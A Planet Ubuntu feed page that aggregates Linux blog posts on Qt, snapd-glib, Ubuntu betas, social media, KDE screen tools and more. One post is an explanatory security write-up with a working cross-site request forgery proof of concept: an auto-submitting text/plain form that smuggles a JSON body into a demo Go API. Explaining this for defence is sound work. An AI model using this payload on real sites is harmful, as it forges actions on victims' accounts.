Most recent items from Ubuntu feeds:
Aurélien Gâteau: Qt 5 based Colorpick from Planet Ubuntu

Colorpick is one of my little side-projects. It is a tool to select colors. It comes with a screen color picker and the ability to check that two colors contrast well enough to be used as the foreground and background colors of a text.

Three instances of Colorpick showing how the background color can be adjusted to make the text readable.

The color picker in action. The cursor can be moved using either the mouse or the arrow keys.
I wrote this tool a few years ago, using Python 2, PyQt 4 and PyKDE 4. It was time for an update. I started by porting it to Python 3, only to find out that apparently there are no Python bindings for KDE Frameworks...
Colorpick uses a few kdelibs widgets and some color utilities. I could probably have rewritten those in PyQt 5, but I was looking for a pretext to have a C++ based side-project again, so instead I rewrote it in C++, using Qt 5 and a couple of KF5 libraries. The code base is small and PyQt code is often very similar to C++ Qt code, so it only took a few 45-minute train commutes to get it ported.
If you are a Colorpick user and were sad to see it still using Qt 4, or if you are looking for a color picker, give it a try!
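Colorpick itself is C++/Qt, but contrast checks like the one it provides are typically based on the WCAG relative-luminance formula. As a rough illustration (this is not Colorpick's actual code), a minimal Python sketch of such a check:

```python
# Illustrative sketch of a WCAG 2.0 contrast-ratio check, the kind of
# test a tool like Colorpick performs. Not Colorpick's actual code.

def srgb_to_linear(channel):
    """Convert one sRGB channel (0-255) to linear light."""
    c = channel / 255.0
    return c / 12.92 if c <= 0.03928 else ((c + 0.055) / 1.055) ** 2.4

def relative_luminance(rgb):
    """WCAG relative luminance of an (r, g, b) color."""
    r, g, b = (srgb_to_linear(c) for c in rgb)
    return 0.2126 * r + 0.7152 * g + 0.0722 * b

def contrast_ratio(fg, bg):
    """Contrast ratio between two colors, ranging from 1.0 to 21.0."""
    l1, l2 = relative_luminance(fg), relative_luminance(bg)
    lighter, darker = max(l1, l2), min(l1, l2)
    return (lighter + 0.05) / (darker + 0.05)

# Black text on a white background is the maximum possible contrast;
# WCAG AA asks for at least 4.5:1 for normal-size text.
print(round(contrast_ratio((0, 0, 0), (255, 255, 255)), 1))  # 21.0
```

Adjusting the background color until this ratio crosses 4.5 (or 7.0 for the stricter AAA level) is essentially what "tweak until the text is readable" means in numbers.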

about 13 hours ago

Robert Ancell: Introducing snapd-glib from Planet Ubuntu

World, meet snapd-glib. It's a new library that makes it easy for GLib based projects (e.g. software centres) to access the daemon that allows you to query, install and remove Snaps. If C is not for you, you can use all the functionality in Python (using GObject Introspection) and Vala. In the future it will support Qt/QML through a wrapper library.

snapd uses a REST API, and snapd-glib matches it very closely. The behaviour is best understood by reading the documentation of that API. To give you a taste of how it works, here's an example that shows how to find and install the VLC snap.

Step 1: Connecting to snapd

The connection to snapd is controlled through the SnapdClient object. This object has all the methods required to communicate with snapd. Create and connect with:

    g_autoptr(SnapdClient) c = snapd_client_new ();
    if (!snapd_client_connect_sync (c, NULL, &error))
        // Something went wrong

Step 2: Find the VLC snap

Asking snapd to perform a find causes it to contact the remote Snap store. This can take some time, so consider using an asynchronous call for this. This is the synchronous version:

    g_autoptr(GPtrArray) snaps =
        snapd_client_find_sync (c,
                                SNAPD_FIND_FLAGS_NONE, "vlc",
                                NULL, NULL, &error);
    if (snaps == NULL)
        // Something went wrong
    for (int i = 0; i < snaps->len; i++) {
        SnapdSnap *snap = snaps->pdata[i];
        // Do something with this snap information
    }

Step 3: Authenticate

Some methods require authorisation in the form of a Macaroon (the link is quite complex, but in practice it's just a couple of strings). To get a Macaroon you need to provide credentials to snapd. In Ubuntu this is your Ubuntu account, but different snapd installations may use another authentication provider. Convert credentials to authorization with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_client_login_sync (c,
                                 email, password, code,
                                 NULL, &error);
    if (auth_data == NULL)
        return EXIT_FAILURE;

Once you have a Macaroon you can store it somewhere and re-use it the next time you need it. The authorization can then be created with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_auth_data_new (macaroon, discharges);
    snapd_client_set_auth_data (c, auth_data);

Step 4: Install VLC

In step 2 we determined that the VLC snap has the name "vlc". Since installing it involves downloading ~100 MB and is going to take some time, the asynchronous method is used. There is a callback that gives updates on the progress of the install and one that is called when the operation completes:

    snapd_client_install_async (c,
                                "vlc", NULL,
                                progress_cb, NULL,
                                NULL,
                                install_cb, NULL);

    static void
    progress_cb (SnapdClient *client,
                 SnapdTask *main_task, GPtrArray *tasks,
                 gpointer user_data)
    {
        // Tell the user what's happening
    }

    static void
    install_cb (GObject *object, GAsyncResult *result,
                gpointer user_data)
    {
        g_autoptr(GError) error = NULL;
        if (snapd_client_install_finish (SNAPD_CLIENT (object),
                                         result, &error))
            // It installed!
        else
            // Something went wrong...
    }

Conclusion

With snapd-glib and the above code as a starting point, you should be able to start integrating Snap support into your project. Have fun!

1 day ago

Lubuntu Blog: Lubuntu Yakkety Yak Beta 1 has been released! from Planet Ubuntu

Lubuntu Yakkety Yak Beta 1 (soon to be 16.10) has been released! We have a couple papercuts listed in the release notes, so please take a look. A big thanks to the whole Lubuntu team and contributors for helping pull this release together. You can grab the images from here: http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/

1 day ago

The Fridge: Yakkety Yak Beta 1 Released from Planet Ubuntu

The Jogpa, in our mad flight, cut off a long lock of the yak’s silky hair. Having secured this, he appeared to be quite satisfied, let go, and sheathed his sword.
– Arnold Henry Savage Landor
The first beta of the Yakkety Yak (to become 16.10) has now been released!
This milestone features images for Lubuntu, Ubuntu GNOME, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio.
Pre-releases of the Yakkety Yak are not encouraged for anyone needing a stable system or anyone who is not comfortable running into occasional, even frequent breakage. They are, however, recommended for Ubuntu flavor developers and those who want to help in testing, reporting and fixing bugs as we work towards getting this bos grunniens ready.
Beta 1 includes a number of software updates that are ready for wider testing. These images are still under development, so you should expect some bugs.
While these Beta 1 images have been tested and work, except as noted in the release notes, Ubuntu developers are continuing to improve the Yakkety Yak. In particular, once newer daily images are available, system installation bugs identified in the Beta 1 installer should be verified against the current daily image before being reported in Launchpad. Using an obsolete image to re-report bugs that have already been fixed wastes your time and the time of developers who are busy trying to make 16.10 the best Ubuntu release yet. Always ensure your system is up to date before reporting bugs.
Lubuntu
Lubuntu is a flavor of Ubuntu based on LXDE and focused on providing a very lightweight distribution.
The Lubuntu 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/

More information about Lubuntu 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/Lubuntu

Ubuntu GNOME
Ubuntu GNOME is a flavour of Ubuntu featuring the GNOME desktop environment.
The Ubuntu GNOME 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntu-gnome/releases/yakkety/beta-1/

More information about Ubuntu GNOME 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuGNOME

Ubuntu Kylin
Ubuntu Kylin is a flavour of Ubuntu that is more suitable for Chinese users. The Ubuntu Kylin 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntukylin/releases/yakkety/beta-1/

More information about Ubuntu Kylin 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuKylin

Ubuntu MATE
Ubuntu MATE is a flavour of Ubuntu featuring the MATE desktop environment for people who just want to get stuff done. The Ubuntu MATE 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntu-mate/releases/yakkety/beta-1/

More information about Ubuntu MATE 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuMATE

Ubuntu Studio
Ubuntu Studio is a flavour of Ubuntu configured for multimedia production. The Ubuntu Studio 16.10 Beta 1 images can be downloaded from:

http://cdimage.ubuntu.com/ubuntustudio/releases/yakkety/beta-1/

More information about Ubuntu Studio 16.10 Beta 1 can be found here:

https://wiki.ubuntu.com/YakketyYak/Beta1/UbuntuStudio

If you’re interested in following the changes as we further develop the Yakkety Yak, we suggest that you subscribe to the ubuntu-devel-announce list. This is a low-traffic list (a few posts a month) carrying announcements of approved specifications, policy changes, beta releases and other interesting events.
http://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-announce
A big thank you to the developers and testers for their efforts to pull together this Beta release!
In addition, we would like to wish Linux a happy 25th birthday!
Originally posted to the ubuntu-release mailing list on Thu Aug 25 22:14:28 UTC 2016 by Set Hallstrom and Simon Quigley on behalf of the Ubuntu Release Team

1 day ago

Alessio Treglia: The Breath of Time from Planet Ubuntu

For centuries man hunted, brought animals to pasture, cultivated fields and sailed the seas without any kind of tool to measure time. Back then, time was not measured but only estimated with vague approximation, and its pace was enough to dictate the steps of the day and the life of man. Subsequently, for many centuries, hourglasses accompanied civilization with the slow flow of their sand grains. About hourglasses, Ernst Jünger writes in “Das Sanduhrbuch” (1954, no English translation): “This small mountain, formed by all the lost moments that fell on each other, could be understood as a comforting sign that time disappears but does not fade. It grows in depth”.
For the philosophers of ancient Greece, time was just a way to measure how things move in everyday life, and in any case there was a clear distinction between “quantitative” time (Kronos) and “qualitative” time (Kairòs). According to Parmenides, time is mere appearance, because its existence…
<Read More…[by Fabio Marzocca]>


1 day ago

Jonathan Riddell: KDevelop, Muon, Plasma 5.7.4 from Planet Ubuntu

To celebrate the release of KDevelop 5 we’ve added KDevelop 5 to KDE neon User Edition.  Git Stable and Git Unstable builds are also in the relevant Developer Editions.
But wait… that's not all! The package manager Muon seems to have a new maintainer, so to celebrate we added builds in User Edition and Git Unstable Developer Edition.
Plasma 5.7.4 has been out for some time now, so it's well past time to get it into Neon; it was delayed by a move in infrastructure which caused the entire repository to rebuild. All Plasma packages should be updated now in KDE neon User Edition.
Want to install it? The weekly User Edition ISO has been updated and looks lovely.


1 day ago

Jono Bacon: Social Media: 10 Ways To Not Screw It Up from Planet Ubuntu

Social media is everywhere. Millions of users, seemingly almost as many networks, and many agencies touting that they have mastered the zen-like secrets to social media and can bring incredible traction.

While social media has had undeniable benefits for many, it has also been contorted and twisted in awkward ways. For every elegant, well-delivered social account there are countless blatant attention-grabbing efforts.

While I am by no means a social media expert, over the years I have picked up some techniques and approaches that I have found useful with the communities, companies, and clients I have worked with. My goal has always been to strike a good balance between quality, engagement, and humility.

I haven’t always succeeded, but here are 10 things I recommend you do if you want to do social media well:

1. Focus on Your Core Networks

There are loads of social media networks out there. For some organizations there is an inherent temptation to grow an audience on all of them. More audiences mean more people, right?

Well, not really.

As with most things in life, it is better to have focus and deliver quality than to spread yourself too thin. So, pick a few core networks and focus on them. Focus on delivering great content, growing your audience, and engaging well.

My personal recommendation is to focus on Twitter and Facebook for sure, as they have significant traction, but Instagram and Google+ are good targets too. It is really up to you, though, to decide what works best for your organization/goals.

2. Configure Your Accounts Well

Every social media network has some options for choosing an avatar, banner, and adding a little text. It is important to get this right.

Put yourself in the position of your audience. Imagine they don’t know who you are and they stumble on your profile. Sure, a picture of a care bear and a quote from The Big Lebowski may look cool, but it doesn’t help the reader.

Their reading of this content is going to result in a judgement call about you. So, reflect yourself accurately. Want to be a professional? Look and write professionally. Want to be a movie fan who believes in magical bears? Well, erm, I guess you know what to do.

It is also important to do this for SEO (Search Engine Optimization). If you want more Google juice for your name/organization, be sure to incorporate it in your profiles and content.

3. Quality vs. Quantity

A while back I spent a bit of time working with some folks who were really into social media. They had all kinds of theories about how the Facebook and Twitter algorithms prioritize content, hide it from users, and only display certain types of content to others. Of course this is not an exact science as these algorithms are typically confidential to those networks.

There is no doubt that social networks have to make some kind of judgement on what to show – there is just too much material to show it all. So, we want to be mindful of these restrictions, but also be wary that a lot of this is guessing.

The trick here is simple: focus on delivering high quality content and just don’t overdo it. Posting 50 tweets in a day is not going to help – it will be too much and probably not high quality (likely due to the quantity). Even if your audience sees it all, it will just seem spammy.

Now, you may be asking what high-quality content looks like. Fundamentally, I see it as understanding your audience and how they communicate, and mirroring those interests and tonality. Some examples:

Well written content that is concise, loose, and fun.
Interesting thoughts, ideas, and discussions.
Links to interesting articles, data, and other material.
Interesting embedded pictures, videos, and other content.

Speaking of embedding…

4. Embed Smartly

All the networks allow you to embed pictures and videos in your social posts.

Where possible, always embed something. It typically results in higher performing posts both in terms of views and click-rate.

Video has proven to do very well on social media networks. People are naturally curious and click the video to see it. Be mindful here though – posting a 45 minute documentary isn’t going to work well. A 2 minute clip will work great though.

Also, check how different networks display videos. For example, on Twitter and Google+, YouTube videos get a decent sized thumbnail and are simple to play. On Facebook though, YouTube videos are noticeably smaller (likely because Facebook doesn’t want people embedding YouTube videos). So, when posting on Facebook, uploading a native video might be best.

Pictures are an interesting one. A few tips:

Square pictures work especially well. They resize well in most social interfaces to take up the maximum amount of space.
The ideal size is 505×505 pixels on Facebook. I have found this size to work well on other networks too.
Images that work particularly well are high contrast and have large letters. They stand out more in a feed and make people want to click them. An example of an image I am using for my Reddit AMA next week:

5. Be Authentic

Authenticity is essential in any human communication. As humans we are constantly advertised to, sold to, and marketed at, and thus evolution has increasingly expanded our bullshit radar.

This radar gets triggered when we see inauthentic content. Examples of this include content trying to be overly peppy, material that requires too many commitments (e.g. registrations), or clickbait. A classic example from our friends at Microsoft:

Social media is fundamentally about sharing and discussion and representing content and tonality that matches your audience. Make sure that you do both authentically.

Share openly, and discuss openly. Act and talk like a human, not a business book, don’t try to be someone you are not, and you will find your audience enjoys your content and finds your efforts rewarding.

6. Connect and Schedule Your Content

Managing all these social media networks is a pain. Of course, there are many tools that you can use for extensive analytics, content delivery, and team collaboration. While these are handy for professional social media people, for many people they are not particularly necessary.

What I do recommend for everyone though is Buffer.

The idea is simple. Buffer lets you fill a giant bucket full of social media posts that will hit the major networks such as Twitter, Facebook, Google+ (pages), and Instagram. You then set a schedule for when these posts should go out and Buffer will take care of sending them for you at an optimal chosen time.

Part of the reason I love this is that if you have a busy week and forget to post on social media, you know that you are always sharing content. Speaking personally, I often line up my posts on a Sunday night and then periodically post during the week.

Speaking of optimal times…

7. Timing Is Everything

If you want your content to get a decent number of views and clicks, there are definitely better times than others to post.

Much of this depends on your audience and where you are geographically. As an example, while I have a fairly global audience for my work, a significant number of people are based in the US. As such, I have found that the best time for my content is in the morning between 8am and 9am Pacific. This still hits Europe and reaches out towards India.

To figure out the best time for you, post some social posts and look at the analytics to see which times work best. Each social network has analytics available and Buffer provides a nice analytics view too, although the nicer stats require a professional plan.

Knowing what is the best time to post combined with the scheduled posting capabilities of Buffer is a great combo.

8. Deliver Structured Campaigns

You might also want to explore some structured campaigns for your social media efforts. These are essentially themed campaigns designed to get people interested or involved.

A few examples:

Twitter Chats – here you simply choose a hashtag and some guests, announce the chat, then invite your guests to answer questions via Twitter and the audience to respond. They can be rather fun.
Calls For Action – again, choose a hashtag, and ask your audience for feedback on certain questions. Responses could include answers, suggestions, content, and more.
Thematic Content – here you post a series of posts with similar images or videos attached.

You are only limited by your imagination, but remember, be authentic. Social media is riddled with cheesy last-breath attempts at engagement. Don’t be one of those people.

9. Don’t Take Yourself too Seriously

There have been various studies suggesting that social media encourages narcissism. There is certainly observational evidence that backs this up.

You should be proud of your work, proud of your projects, and focus on doing great things. Always try to ensure that you are down to earth, though, and demonstrate a grounded demeanor in your posts. No one likes ego, and it is more tempting than ever to use social media as a platform for a confidence boost and to post ego-driven, narcissistic content.

Let’s be honest, we have all made this mistake from time to time. I know I have. We are human beings, after all.

As I mentioned earlier, you always want to try to match your tonality to your audience. For some global audiences, though, it can be tempting to err on the side of caution and be a little too buttoned up. This often ends up being just boring. Be professional, sure, but surprise your audience with your humanity and your humility, and show that there is a real person behind the tweet or post.

10. What Not To Do

Social media can be a lot of fun and with some simple steps (such as these) you can perform some successful and rewarding work. There are a few things I would recommend you don’t do though:

Unless you want to be a professional provocateur, avoid deliberately fighting with your audience. You will almost certainly disagree with many of your followers on some political stances – picking fights won’t get you anywhere.
Don’t go and follow everyone for the purposes of getting followed back. When I see that Joe Bloggs has 5,434 followers and is following 5,654 people, it smacks of this behavior.
Don’t be overtly crass. I know some folks online, and even worked with some people, who just can’t help dropping F bombs, crass jokes, and more online. Be fun, be a little edgy, but keep it classy, people.

So, that’s it. Just a few little tips and tricks I have learned over the years. I hope some of this helps. If you found it handy, click those social buttons on the side and practice what you preach and share this post.

I would love to learn from you though. What approaches, methods, and techniques have you found for doing social media better? Share your ideas in the comment box and let’s have a discussion…
The post Social Media: 10 Ways To Not Screw It Up appeared first on Jono Bacon.

1 day ago

Ubuntu Insights: 25 Linux devices to celebrate 25 years of Linux! from Planet Ubuntu

Happy 25th birthday Linux. It’s a monumental milestone!
Over the years Canonical has been working on putting Linux in the hands of millions of people and worked with various hardware vendors to release over 1000 models of Linux hardware (!)
Today we’re celebrating by showcasing 25 Ubuntu devices released over the years, from laptops, netbooks, tower computers, phones, tablets, development boards and drones to robotic spiders. We hope you enjoy the list – there are some golden oldies – and we look forward to the next 25 years!
Plus if you have a favourite device from the list (or not), why not let us know by tweeting #UbuntuDevices – enjoy!
25 Ubuntu Devices

1. System76 (June 2005) System76 was the first hardware vendor to offer packaged Ubuntu laptops, desktops and servers!

2. Dell Inspiron Mini 9 (Sep 2008) The Dell Inspiron Mini Series was a line of subnotebook/netbook computers designed by Dell

3. ZaReason Verix 545 (Jun 2010) ZaReason only makes Linux computers

4. HP Mini 5103 (Sep 2010) Another netbook!

5. HP Compaq 4000 (Jan 2011) A stable and reliable PC mainly for business use

6. Dell Wyse T50 (Sep 2011) Fast and affordable thin client for Cloud Client Computing Deployments

7. Asus Eee PC 1015CX – (March 2012) Netbooks are still in favour… getting smaller and cheaper!

8. Acer Veriton Z (Jan 2013) One of the many towers running Ubuntu

9. Turtlebot 2 (March 2013) The 2nd iteration of the robotic development platform

10. BQ E4.5 (Feb 2015) And here it is – our very first Ubuntu Phone!

11. Raspberry Pi 2 (Feb 2015) A collaboration with the Raspberry Pi Foundation where Snappy Ubuntu Core is available for the Raspberry Pi 2

12. Meizu MX4 (July 2015) Our first release with Chinese partners, Meizu

13. Lenovo Thinkpad L450 (July 2015) Continually shipping Ubuntu pre-installed on laptops worldwide

14. Intel Compute Stick (July 2015) Enabling the transformation of a display into a fully functioning computer for home use or digital signage!

15. Erle Spider (Sep 2015) The first legged drone powered by ROS and running snappy Ubuntu Core

16. Dell XPS 15 (October 2015) The second iteration of this laptop built for developers who need a powerful Linux desktop!

17. ROBOTIS OP2 (Oct 2015) All we can say is, he was a hit at MWC 16!

18. DJI Manifold (Nov 2015) A high-performance embedded computer designed specifically to fly

19. BQ Aquaris M10 (Feb 2016) Reinventing the personal mobile computing experience with our first converged device

20. Meizu PRO 5 (Feb 2016) Our most powerful phone to date!

21. Intel NUC (Feb 2016) A platform for developers to test and create x86-based IoT solutions using snappy Ubuntu Core; also used for digital signage solutions

22. Samsung Artik 5+10 (May 2016) Developer images available on 2x boards!

23. Bubblegum 96 board (July 2016) Image of Ubuntu Core available for uCRobotics on this awesome board

24. Mycroft (July 2016) The open source answer to natural language platforms

25. Intel Joule board (Aug 2016) A new development board in the Ubuntu family, targeting IoT and robotics makers

Want to find out how to develop for all these great devices? Develop with Ubuntu

1 day ago

Ubuntu Podcast from the UK LoCo: S09E26 – Mosaic Promise - Ubuntu Podcast from Planet Ubuntu

It’s Episode Twenty-six of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!
In this week’s show:

We discuss how we each discovered the Web, in honour of it being 25 years since the first website went online.

We also discuss switching to the Ubuntu Phone full-time, creating an Ubuntu Podcast Roku Channel, and fixing things with Sugru.

We share a Command Line Lurve:

systemd-analyze blame which shows you what’s eating time during startup.
systemd-analyze plot > foo.html which generates a chart.

And we go over all your amazing feedback – thanks for sending it – please keep sending it!

Michael Tunnell from TuxDigital made a video explaining the new ‘apt’.

This week’s cover image is taken from Pixabay.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Join us on IRC in #ubuntu-podcast on Freenode

2 days ago

Ubuntu Insights: 25 years on and Linux is still going strong from Planet Ubuntu

I embarked on the Linux journey in 2004 when I joined the newly founded Canonical and its not-yet-named Ubuntu team. I knew there was incredible opportunity around Linux but even then it wasn’t clear how pervasive Linux would become in all corners of technology, industry and society. Linux started its journey as a platform for researchers and developers and over the last 25 years it has become the innovator’s production platform across all computing platforms we use today. Perhaps it is fairer to say that the world has become developer-led, and since Linux is the first choice of developers, the world has adopted Linux by default. Servers, mobile, IoT and more all primarily run on Linux because the developers who make the most interesting things generally start on Linux.
Canonical is proud to support Linux with Ubuntu as the developer platform of choice. Enabling developers to be agile and effective is the best way to encourage the next wave of technical innovation. The leaders in drones, robotics, blockchain, artificial intelligence, self-driving cars and computer vision are all blazing their trail on Ubuntu today, and these are the technologies that will shape our lives in the coming years. Canonical shapes Ubuntu to be the fastest, easiest and most economical way to deliver innovation in real products – from the cloud to the edge of the network.
We’re also incredibly proud to continue to support Linux’s journey as the production platform for the enterprise and telecoms infrastructure we see today. Ubuntu is used in more than 55% of the production OpenStack clouds around the world. Enterprise and Telco deployments on Ubuntu have changed the way business deploys IT infrastructure. And we are already leading on what’s next for the future of cloud computing with NFV, Containerisation, and Machine Learning. On the IoT front we’re reshaping the nature of the device and the software operations experience for distributed computing with Ubuntu Core, built for IoT deployments where transactional upgrades, constrained environments, and security are the primary requirements.
While the cloud runs almost entirely on Linux, we think the desktop remains an important focus for Linux innovation too. Ubuntu started from the desktop, and is still innovating with the creation of a unique experience that converges the mobile and desktop worlds. Containers of all forms – docker, LXD and snap packaging are a new way for developers to design, distribute and run applications across clouds, devices and distributions.
So what does the next 25 years look like? As they say, the future is already here, just not evenly distributed. With machine learning progress going exponential, I think societies in future can expect to put even more trust in software for their everyday needs, and I’m glad that the trend is increasingly in favour of software that is shared, that is free for all to build upon, and that can be examined and improved by anybody. Public benefit depends on private innovation, and the fact that Linux as an open platform exists enables that innovation to come from anywhere. That’s something to celebrate. Happy birthday, Linux!

2 days ago

Sebastian Kügler: Multiscreen in Plasma: Improved tools and debugging from Planet Ubuntu

Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.
Multi-screen support means that you can connect more than one screen to your computer. The following use cases give good examples of the scope:

Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
Projector The computer is connected to a projector or TV.

The idea is that when the user plugs in or starts up with that configuration, and has already configured this hardware combination, the setup is restored. Otherwise, a reasonable guess is made to give the user a good starting point to fine-tune the setup.

This is the job of KScreen. At a technical level, kscreen consists of three parts:

system settings module This can be reached through system settings
kscreen daemon Run in a background process, this component saves, restores and creates initial screen configurations.
libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others, which allow talking to the exact same programming interface, independent of the display server in use.
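The value of that last layer is that callers program against one interface while backends hide the display-server specifics. A toy Python sketch of the idea (all class and method names here are invented for illustration; libkscreen's real API is C++/Qt):

```python
# Toy illustration of libkscreen's backend abstraction: one programming
# interface, interchangeable display-server backends. All names invented.
from abc import ABC, abstractmethod

class ConfigBackend(ABC):
    """What every backend (X11, Wayland, ...) would have to provide."""
    @abstractmethod
    def read_config(self) -> dict: ...
    @abstractmethod
    def apply_config(self, config: dict) -> None: ...

class FakeX11Backend(ConfigBackend):
    """Stand-in for a real backend; keeps the config in memory."""
    def __init__(self):
        self._config = {"outputs": [{"name": "HDMI-1", "enabled": True}]}
    def read_config(self):
        return self._config
    def apply_config(self, config):
        self._config = config

def move_output(backend: ConfigBackend, name: str, pos: tuple) -> dict:
    """Caller code only sees the ConfigBackend interface, so it works
    unchanged regardless of the display server actually in use."""
    config = backend.read_config()
    for output in config["outputs"]:
        if output["name"] == name:
            output["position"] = pos
    backend.apply_config(config)
    return backend.read_config()

new_config = move_output(FakeX11Backend(), "HDMI-1", (1920, 0))
print(new_config["outputs"][0]["position"])  # (1920, 0)
```

Swapping FakeX11Backend for a hypothetical Wayland equivalent would leave move_output untouched, which is exactly the separation the daemon and the settings module rely on.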

At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.
So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending and waking up with different configurations; the laptop’s lid may be closed or opened (and when that happens, we don’t even get an event that it closed); displays come and go; depending on their connection, the same piece of hardware might support completely different resolutions; hardware comes with broken EDID information; display connectors come and go, and so do display controllers (CRTCs); and on top of all that, the only way we get to know what actually works for the user is the “throw stuff against the wall and observe what sticks” tactic.
This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)
So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled, were positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.

Better tools
Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon). We also need to figure out what happens exactly, and when it does. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to piece together what exactly goes on from separate log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.
A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper that can give system information useful for debugging. Perhaps more importantly, I knew I’d be missing a command-line tool to futz around with screen configurations from the shell or from scripts as Wayland arrives. kscreen-doctor lets you change the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable
Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0

Please note that kscreen-doctor is quite experimental. It’s a tool that lets you shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eats your hamster.
Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of trick allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there: I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and working in the future.

3 days ago

David Tomaschik: Posting JSON with an HTML Form from Planet Ubuntu

A coworker and I were looking at an application today that, like so many other
modern web applications, offers a RESTful API with JSON being used for
serialization of requests/responses. She noted that the application didn’t
include any sort of CSRF token and didn’t seem to use any of the headers
(X-Requested-With, Referer, Origin, etc.) as a “poor man’s CSRF token”, but
since it was posting JSON, was it really vulnerable to CSRF? Yes, yes,
definitely yes!

The idea that the use of a particular encoding is a security boundary is, at
worst, a completely wrong notion of security, and at best, a stopgap until W3C,
browser vendors, or a clever attacker gets hold of your API. Let’s examine JSON
encoding as a protection against CSRF and demonstrate a mini-PoC.

The Application

We have a basic application written in Go. Authentication checking is elided
for post size, but this is not just an unauthenticated endpoint.

package main

import (
	"encoding/json"
	"fmt"
	"net/http"
)

type Secrets struct {
	Secret int
}

var storage Secrets

// handler overwrites the stored secret with whatever JSON body a
// POST request carries, then echoes the current value back.
func handler(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		json.NewDecoder(r.Body).Decode(&storage)
	}
	fmt.Fprintf(w, "The secret is %d", storage.Secret)
}

func main() {
	http.HandleFunc("/", handler)
	http.ListenAndServe(":8080", nil)
}

As you can see, it basically serves a secret number that can be updated via
HTTP POST of a JSON object. If we attempt a URL-encoded or multipart POST, the
JSON decoding fails miserably and the secret remains unchanged. We must POST
JSON in order to get the secret value changed.

Exploring Options

So let’s explore our options here. The site can locally use AJAX via the
XMLHttpRequest API, but due to the Same-Origin Policy, an attacker’s site
cannot use this. For most CSRF, the way to get around this is plain HTML
forms, since form submission is not subject to the Same-Origin Policy. The
W3C had a draft specification for JSON forms, but that has been abandoned
since late 2015 and isn’t supported in any browsers. There are probably some
techniques that can make use of Flash or other browser plugins (aren’t there
always?), but it can even be done with basic forms; it just takes a little
work.

JSON in Forms

Normally, if we try to POST JSON as, say, a form value, it ends up being URL encoded,
not to mention including the field name.

<form method='POST'>
<input name='json' value='{"foo": "bar"}'>
<input type='submit'>
</form>

Results in a POST body of:

json=%7B%22foo%22%3A+%22bar%22%7D

Good luck decoding that as JSON!

Doing it as the form field name doesn’t get any better.

%7B%22foo%22%3A+%22bar%22%7D=value

It turns out you can set the enctype of your form to text/plain and avoid the
URL encoding on the form data. At this point, you’ll get something like:

json={"foo": "bar"}

Unfortunately, we still have to contend with the form field name and the
separator (=). This is a simple matter of splitting our payload across both
the field name and value, and sticking the equals sign in an unused field. (Or
you can use it as part of your payload if you need one.)

Putting it All Together

<body onload='document.forms[0].submit()'>
<form method='POST' enctype='text/plain'>
<input name='{"secret": 1337, "trash": "' value='"}'>
</form>
</body>

This results in a request body of:

{"secret": 1337, "trash": "="}

This parses just fine and updates our secret!

3 days ago

Aaron Honeycutt: Razer Hardware on Linux from Planet Ubuntu

